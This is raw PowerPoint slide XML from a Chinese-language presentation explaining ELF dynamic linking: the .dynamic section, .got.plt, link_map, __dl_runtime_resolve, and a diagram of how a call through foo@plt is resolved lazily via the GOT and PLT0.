            <a:off x="1023133" y="2723833"/>
            <a:ext cx="1327200" cy="3028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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sections</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Shape 831"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4204000" y="2474669"/>
            <a:ext cx="1327200" cy="3028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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Shape 832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7238500" y="2626069"/>
            <a:ext cx="4355200" cy="3360000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609585" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.dynamic section</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>提供动态链接相关信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>link_map</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>保存进程载入的动态链接库的链表</a:t>
            </a:r>
            <a:endParaRPr kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="609585" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>dl_runtime_resolve</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1219170" lvl="1" indent="-423323" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>装载器中用于解析动态链接库中函数的实际地址的函数</a:t>
            </a:r>
            <a:endParaRPr kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD29D2B-1C97-4DAF-A588-2CE42B37FD7B}"/>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动态链接过程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956404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8" name="Shape 838"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839" name="Shape 839"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="840" name="Shape 840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Shape 841"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Shape 842"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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jmp *(foo@GOT)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push index</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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="843" name="Shape 843"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="844" name="Shape 844"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Shape 845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Shape 846"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Shape 847"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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848" name="Shape 848"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="849" name="Shape 849"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="840" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F779353E-A0A7-437E-A134-B72A780FA783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="2605200"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调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>libc</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中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> foo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A9BAEC-F32B-4914-B17B-F649B0E298D4}"/>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动态链接过程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5" name="Shape 855"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>call foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="856" name="Shape 856"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="42105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printf</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="857" name="Shape 857"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="46201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foo@plt+6</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="858" name="Shape 858"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="50297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bar</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Shape 859"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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jmp *(foo@GOT)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push index</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jmp PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Shape 860"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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push *(GOT+4)</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jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="861" name="Shape 861"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000"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.text</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="862" name="Shape 862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4166233"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>foo@plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Shape 863"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002067"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PLT0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864" name="Shape 864"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1407000" y="54393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865" name="Shape 865"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1481933" y="3770184"/>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.got.plt</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="866" name="Shape 866"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="867" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="3502200" y="2792900"/>
            <a:ext cx="1060400" cy="2032000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAA00084-DE0A-40EA-8523-36C89568360D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148470" y="4865168"/>
            <a:ext cx="2055306"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进程首次调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5EEA441-78D2-44A8-A795-4C9EBEA86B11}"/>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动态链接过程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3" name="Shape 873"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1330400"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call foo@plt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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874" name="Shape 874"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
